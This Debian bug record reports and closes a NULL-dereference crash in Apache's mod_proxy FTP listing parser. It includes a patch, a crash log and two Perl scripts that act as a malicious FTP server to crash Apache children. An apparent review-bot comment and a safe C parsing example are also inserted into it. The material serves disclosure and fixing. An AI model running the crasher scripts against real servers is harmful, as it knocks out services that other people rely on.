
Bug#413727: marked as done (apache2.2-common: mod_proxy_ftp segfaults (NULL deref.) when FTP server sends back no spaces)



Your message dated Sun, 10 Jun 2007 17:47:04 +0000
with message-id <E1HxRVI-0002Ky-KS@ries.debian.org>
and subject line Bug#413727: fixed in apache2 2.2.3-5
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--- Begin Message ---
Subject: apache-common: mod_proxy segfaults (NULL deref.) when FTP server sends back no spaces
Package: apache-common
Version: 1.3.34-4
Severity: important
Tags: patch

Hello,

I have found a NULL dereferencing bug in mod_proxy. If there is a malicious remote
FTP server and someone uses Apache and mod_proxy to connect to that FTP server,
the server can reply to "LIST" with a directory listing showing directories or
ordinary files with no spaces whatsoever in the line. There is a strrchr(3) call
with no check if it returns NULL, and the code afterwards crashes the Apache child
when the server sends back such lines without spaces.

The bug affects both the 1.3.x and 2.x branches of Apache.

I do not see any security implications to this bug, despite the remote crashing, as
it only seems possible to use it to crash the Apache child and not the main process,
no matter what MPM you use.

This was reported to upstream a few months ago:

  o  http://issues.apache.org/bugzilla/show_bug.cgi?id=40733

// Ulf Harnhammar


metaur:~# fgrep ftpspecial /etc/services
ftpspecial      1096/tcp
ftpspecial      1096/udp
metaur:~# tail -n2 /etc/inetd.conf
ftp     stream  tcp     nowait  root  /usr/bin/perl perl /root/apache-crasher.pl
ftpspecial      stream  tcp     nowait  root    /usr/bin/perl perl /root/apache-crasher2.pl
metaur:~# fgrep -A33 'mod_proxy' /etc/apache/httpd.conf
<IfModule mod_proxy.c>
    #
    # Proxy Server directives. Uncomment the following lines to
    # enable the proxy server:
    #
    ProxyRequests On

    <Directory proxy:*>
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1
    </Directory>


    #
    # Enable/disable the handling of HTTP/1.1 "Via:" headers.
    # ("Full" adds the server version; "Block" removes all outgoing Via: headers)
    # Set to one of: Off | On | Full | Block
    #
    #ProxyVia On

    #
    # To enable the cache as well, edit and uncomment the following lines:
    # (no cacheing without CacheRoot)
    #
    #CacheRoot "/var/cache/apache"
    #CacheSize 5
    #CacheGcInterval 4
    #CacheMaxExpire 24
    #CacheLastModifiedFactor 0.1
    #CacheDefaultExpire 1
    #NoCache a_domain.com another_domain.edu joes.garage_sale.com

</IfModule>
metaur:~# nc localhost 80
GET ftp://localhost/ HTTP/1.0

metaur:~# cd /var/log/apache
metaur:/var/log/apache# cat access.log
metaur:/var/log/apache# cat error.log
[Sat Dec 23 00:11:53 2006] [notice] Apache configured -- resuming normal operations
[Sat Dec 23 00:11:53 2006] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sat Dec 23 00:13:25 2006] [notice] child pid 20656 exit signal Segmentation fault (11)
metaur:/var/log/apache# cd
metaur:~#


-- System Information:
Debian Release: 4.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27-3-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages apache-common depends on:
ii  apache2-utils         2.2.3-3.2          utility programs for webservers
ii  debconf [debconf-2.0] 1.5.8              Debian configuration management sy
ii  dillo [www-browser]   0.8.5-4            Small and fast web browser
ii  elinks [www-browser]  0.11.1-1.2         advanced text-mode WWW browser
ii  epiphany-browser [www 2.14.3-3           Intuitive GNOME web browser
ii  firefox [www-browser] 1.5.dfsg+1.5.0.7-2 lightweight web browser based on M
ii  galeon [www-browser]  2.0.2-4            GNOME web browser for advanced use
ii  konqueror [www-browse 4:3.5.5a.dfsg.1-2  KDE's advanced file manager, web b
ii  libc6                 2.3.6.ds1-8        GNU C Library: Shared libraries
ii  libdb4.4              4.4.20-8           Berkeley v4.4 Database Libraries [
ii  libexpat1             1.95.8-3.3         XML parsing C library - runtime li
ii  links2 [www-browser]  2.1pre26-4         Web browser running in both graphi
ii  lynx [www-browser]    2.8.5-2sarge2.2    Text-mode WWW Browser
ii  mime-support          3.39-1             MIME files 'mime.types' & 'mailcap
ii  perl                  5.8.8-6.1          Larry Wall's Practical Extraction 
ii  sed                   4.1.5-1            The GNU sed stream editor
ii  ucf                   2.0017             Update Configuration File: preserv

apache-common recommends no packages.

-- debconf information excluded

--- src/modules/proxy/proxy_ftp.c.old	2006-12-22 23:44:57.000000000 +0100
+++ src/modules/proxy/proxy_ftp.c	2006-12-23 00:23:13.000000000 +0100
@@ -357,33 +357,38 @@ static long int send_dir(BUFF *data, req
             }
 
             filename = strrchr(buf, ' ');
-            *(filename++) = 0;
-
-            /* handle filenames with spaces in 'em */
-            if (!strcmp(filename, ".") || !strcmp(filename, "..") || firstfile) {
-                firstfile = 0;
-                searchidx = filename - buf;
-            }
-            else if (searchidx != 0 && buf[searchidx] != 0) {
-                *(--filename) = ' ';
-                buf[searchidx - 1] = 0;
-                filename = &buf[searchidx];
-            }
-
-            /* Special handling for '.' and '..': append slash to link */
-            if (!strcmp(filename, ".") || !strcmp(filename, "..") || buf[0] == 'd') {
-                ap_snprintf(buf2, buf_size, "%s <a href=\"%s/\">%s</a>\n",
-                         ap_escape_html(p, buf), ap_escape_uri(p, filename),
-                            ap_escape_html(p, filename));
-            }
-            else {
-                ap_snprintf(buf2, buf_size, "%s <a href=\"%s\">%s</a>\n",
-                            ap_escape_html(p, buf),
-                            ap_escape_uri(p, filename),
-                            ap_escape_html(p, filename));
+            if (filename == NULL) {
+                ap_log_rerror(APLOG_MARK, APLOG_ERR, c->req,
+                              "proxy: error parsing %s", buf);
+            } else {
+                *(filename++) = 0;
+
+                /* handle filenames with spaces in 'em */
+                if (!strcmp(filename, ".") || !strcmp(filename, "..") || firstfile) {
+                    firstfile = 0;
+                    searchidx = filename - buf;
+                }
+                else if (searchidx != 0 && buf[searchidx] != 0) {
+                    *(--filename) = ' ';
+                    buf[searchidx - 1] = 0;
+                    filename = &buf[searchidx];
+                }
+
+                /* Special handling for '.' and '..': append slash to link */
+                if (!strcmp(filename, ".") || !strcmp(filename, "..") || buf[0] == 'd') {
+                    ap_snprintf(buf2, buf_size, "%s <a href=\"%s/\">%s</a>\n",
+                             ap_escape_html(p, buf), ap_escape_uri(p, filename),
+                                ap_escape_html(p, filename));
+                }
+                else {
+                    ap_snprintf(buf2, buf_size, "%s <a href=\"%s\">%s</a>\n",
+                                ap_escape_html(p, buf),
+                                ap_escape_uri(p, filename),
+                                ap_escape_html(p, filename));
+                }
+                ap_cpystrn(buf, buf2, buf_size);
+                n = strlen(buf);
             }
-            ap_cpystrn(buf, buf2, buf_size);
-            n = strlen(buf);
         }
         /* else??? What about other OS's output formats? */
         else {
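Review bot: the new `filename == NULL` branch logs the malformed line but leaves `buf` and `n` untouched, so whatever follows this block still sees the raw server-supplied line at its original length, whereas every other path rewrites `buf` through `ap_escape_html()` and sets `n = strlen(buf)`. Since the listing is emitted as HTML (the `<a href=...>` anchors built here), the unparsed line should not fall through unescaped: either pass it through `ap_escape_html()` too, or drop it in the error branch with `buf[0] = 0; n = 0;`. A smaller point: logging every such line at `APLOG_ERR` with its remote-supplied content lets one listing fill the error log; `APLOG_WARNING`, or logging once per directory listing, would be less noisy.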
#!/usr/bin/perl --

# apache-crasher.pl
# by Ulf Harnhammar in 2004-2006
# I hereby place this program in the public domain.

use strict;
use Socket;

$main::loggedin = 0;


sub mysend($)
{
  print "$_[0]\015\012";
} # sub mysend($)


sub myreceive($)
{
  my $inp = '';

  $inp = <STDIN>; $inp =~ tr/\015\012\000//d;
  $_[0] = $inp;
} # sub myreceive($)


$main::ipline = `/sbin/ifconfig | egrep '^ *inet addr:' | fgrep -v '127.0.0.1'`;
$main::ipline =~ s|^ *inet addr:||;
$main::ipline =~ s|^([0-9.]+).*$|$1|s;
die "don't know my address\n" unless $main::ipline;
$main::ipline =~ tr/./,/;

$|++;
mysend('220 Welcome to apache crasher 0.1.0 !!');

while (1)
{
  my ($str, $savestr, $reststr) = ('', '', '');

  alarm 5;
  myreceive($str);
  alarm 0;
  $savestr = $str;
  $str =~ s|^([A-Z]+) *(.*)$|$1|;
  $reststr = $2;

  if ($str eq 'USER')
  {
    mysend('331 Anonymous access allowed, send identity (e-mail name) '.
           'as password.');
    $main::loggedin = 1;
    next;
  }

  if (($str eq 'PASS') && ($main::loggedin == 1))
  { mysend('230 Anonymous user logged in.'); $main::loggedin = 2; next; }

  if ($main::loggedin < 2)
  { mysend("500 '$savestr': Command not understood."); next; }

  if ($str eq 'SYST')
  { mysend('215 Windows_NT'); next; }

  if ($str eq 'PWD')
  { mysend('257 "/" is current directory.'); next; }

  if ($str eq 'TYPE')
  { mysend("200 Type set to $reststr."); next; }

  if ($str eq 'PASV')
  {
    mysend("227 Entering Passive Mode ($main::ipline,4,72)"); next;
  }

  if ($str eq 'LIST')
  {
    sleep 2;
    mysend('226 Transfer complete.');
    next;
  }

  if ($str eq 'QUIT')
  {
    mysend('221  Thanks for using apache crasher 0.1.0 !');
    exit 0;
  }

  mysend("500 '$savestr': Command not understood.");
} # while 1


__END__
#!/usr/bin/perl --

# apache-crasher2.pl
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

print '-rwxrwxrwx_______________________'.
      "Apache_Crasher_0.1.0\015\012";

--- End Message ---
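The parsing step the report describes, as an added example in C that is not Apache's code: a stand-alone version of send_dir()'s split-at-last-space with the NULL result of strrchr() handled, run over a constructed listing that includes a line with no spaces. The function, enum and sample lines are this example's own, and the original's column-alignment logic for names containing spaces (firstfile/searchidx) is left out.

```c
/* Added example, not Apache's code: the file-name split that send_dir() in
 * proxy_ftp.c performs with strrchr(buf, ' '), written so that a listing
 * line without any space is rejected instead of dereferencing NULL. */
#include <string.h>

enum { LIST_OK = 0, LIST_MALFORMED = -1 };   /* this example's own names */

/* Split one Unix-style "ls -l" line in place at its last space: the text
 * before it stays in buf, *filename points at the name after it. A line
 * with no space is exactly what crashed Apache (strrchr() returned NULL
 * and *(filename++) = 0 wrote through it); here it yields LIST_MALFORMED
 * and buf is left unmodified so the caller can drop the line. */
static int parse_listing_line(char *buf, char **filename)
{
    char *sp;
    *filename = NULL;
    if (buf == NULL || buf[0] == '\0')
        return LIST_MALFORMED;
    /* send_dir() only treats d/-/l lines as Unix entries with a name field. */
    if (buf[0] != 'd' && buf[0] != '-' && buf[0] != 'l')
        return LIST_MALFORMED;
    sp = strrchr(buf, ' ');
    if (sp == NULL || sp[1] == '\0')   /* no space, or nothing after it */
        return LIST_MALFORMED;
    *sp = '\0';
    *filename = sp + 1;
    return LIST_OK;
}

/* Walk a whole listing (CRLF- or LF-separated) the way the proxy loop
 * does, one bounded line at a time; returns the number of lines that
 * parsed, and stores in *rejected how many were dropped as malformed. */
static int count_listing(const char *listing, int *rejected)
{
    char line[256], *name;
    int accepted = 0;
    const char *p = listing;
    *rejected = 0;
    while (*p != '\0') {
        size_t len = strcspn(p, "\r\n");
        if (len > sizeof line - 1)          /* truncate oversized lines */
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_listing_line(line, &name) == LIST_OK)
            accepted++;
        else
            (*rejected)++;
        p += strcspn(p, "\r\n");             /* skip the rest of the line */
        while (*p == '\r' || *p == '\n')
            p++;
    }
    return accepted;
}
```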
--- Begin Message ---
Source: apache2
Source-Version: 2.2.3-5

We believe that the bug you reported is fixed in the latest version of
apache2, which is due to be installed in the Debian FTP archive:

apache2-doc_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2-doc_2.2.3-5_all.deb
apache2-mpm-event_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-mpm-event_2.2.3-5_i386.deb
apache2-mpm-perchild_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2-mpm-perchild_2.2.3-5_all.deb
apache2-mpm-prefork_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-mpm-prefork_2.2.3-5_i386.deb
apache2-mpm-worker_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-mpm-worker_2.2.3-5_i386.deb
apache2-prefork-dev_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-prefork-dev_2.2.3-5_i386.deb
apache2-src_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2-src_2.2.3-5_all.deb
apache2-threaded-dev_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-threaded-dev_2.2.3-5_i386.deb
apache2-utils_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-utils_2.2.3-5_i386.deb
apache2.2-common_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2.2-common_2.2.3-5_i386.deb
apache2_2.2.3-5.diff.gz
  to pool/main/a/apache2/apache2_2.2.3-5.diff.gz
apache2_2.2.3-5.dsc
  to pool/main/a/apache2/apache2_2.2.3-5.dsc
apache2_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2_2.2.3-5_all.deb
A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 413727@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Stefan Fritsch <sf@debian.org> (supplier of updated apache2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Sun, 10 Jun 2007 18:54:29 +0200
Source: apache2
Binary: apache2-utils apache2-prefork-dev apache2 apache2-mpm-prefork apache2-doc apache2-mpm-event apache2.2-common apache2-mpm-worker apache2-src apache2-threaded-dev apache2-mpm-perchild
Architecture: source all i386
Version: 2.2.3-5
Distribution: unstable
Urgency: low
Maintainer: Debian Apache Maintainers <debian-apache@lists.debian.org>
Changed-By: Stefan Fritsch <sf@debian.org>
Description: 
 apache2    - Next generation, scalable, extendable web server
 apache2-doc - documentation for apache2
 apache2-mpm-event - Event driven model for Apache HTTPD
 apache2-mpm-perchild - Transitional package - please remove
 apache2-mpm-prefork - Traditional model for Apache HTTPD
 apache2-mpm-worker - High speed threaded model for Apache HTTPD
 apache2-prefork-dev - development headers for apache2
 apache2-src - Apache source code
 apache2-threaded-dev - development headers for apache2
 apache2-utils - utility programs for webservers
 apache2.2-common - Next generation, scalable, extendable web server
Closes: 312385 322385 390348 391813 396162 397789 399043 400981 401053 403682 407307 412407 412580 412602 413727 416322 418464 419552 420101 422589 423653 428058
Changes: 
 apache2 (2.2.3-5) unstable; urgency=low
 .
   [ Tollef Fog Heen ]
   * Fix up apache2-src so the .tar.gz contains an apache2 top level
     directory.
   * Make apache2 MPMs provide and conflict with apache2-mpm so other
     packages can provide MPMs too.
   * Get rid of 2.1 references from descriptions.  (Closes: #400981)
 .
   [ Thom May ]
   * Let the init script cope with multiple pid files correctly. Probably we
     shouldn't be doing this at all, but we might as well do it properly!
     (Closes: #396162)
   * Add a sensible autoindex default config
   * Add patch from upstream to ensure that mod_cgi 500 responses aren't
     truncated (Closes: #412580)
   * Use graceful-stop to shutdown apache to ensure we cope nicely with long
     running or blocked children
 .
   [ Peter Samuelson ]
   * Ship apache2 manpage in apache2.2-common.  (Closes: #391813)
   * Rearrange init script so that 'force-reload' is the same as 'reload'.
     (Closes: #401053)
   * Add Build-Depends: mawk.  (Closes: #403682)
   * Add a needed <IfModule mod_include.c> guard to apache2.conf.
     (Closes: #407307)
   * Stop shipping /var/run/apache2/ as it is created at runtime anyway.
   * Move the /var/lock/apache2 owner fix from the apache2.2-common
     postinst to the init script, as /var/lock may not persist across
     reboots.  (Closes: #420101)
 .
   [ Stefan Fritsch ]
   * Add Build-Depends: libssl-dev, zlib1g-dev (Closes: #399043)
   * Add XS-Vcs-* to debian/control
   * Improve handling of empty $MODNAME in a2enmod (Closes: #422589)
   * Treat apache2-mpm-itk as prefork in a2enmod (Closes: #412602)
   * Re-add README.Debian and describe
     - the config dir layout (closes: #419552)
     - which files are ignored by Include
     - when and how to change "restart" to "reload" in the logrotate script
   * When purging, remove {mods,sites}-enabled symlinks and the config files
     created by postinst (Closes: #397789)
   * Fix suexec to log after a cgi error (Closes: #312385)
   * Add watch file
   * Add AddType for .bz2 (Closes: #416322)
   * Make init script messages conform better to policy (Closes: #390348)
     and exit with failure if called with unknown parameter (Closes: #412407)
   * Fix segfault in mod_proxy_ftp when FTP server sends back no spaces
     (Closes: #413727)
   * Ship /etc/apache2/conf.d/apache2-doc (Closes: #418464)
   * Tell the user when selecting cgid instead of cgi (Closes: #428058)
   * Add a2ensite/a2dissite man pages (Closes: #322385)
   * Comment out CacheEnable by default, to prevent filling up /var.
     Document the problem in README.Debian and NEWS.Debian, point to
     htcacheclean and give a warning when doing a2enmod disk_cache
     (Closes: #423653).
   * Add myself to Uploaders.
Files: 



--- End Message ---
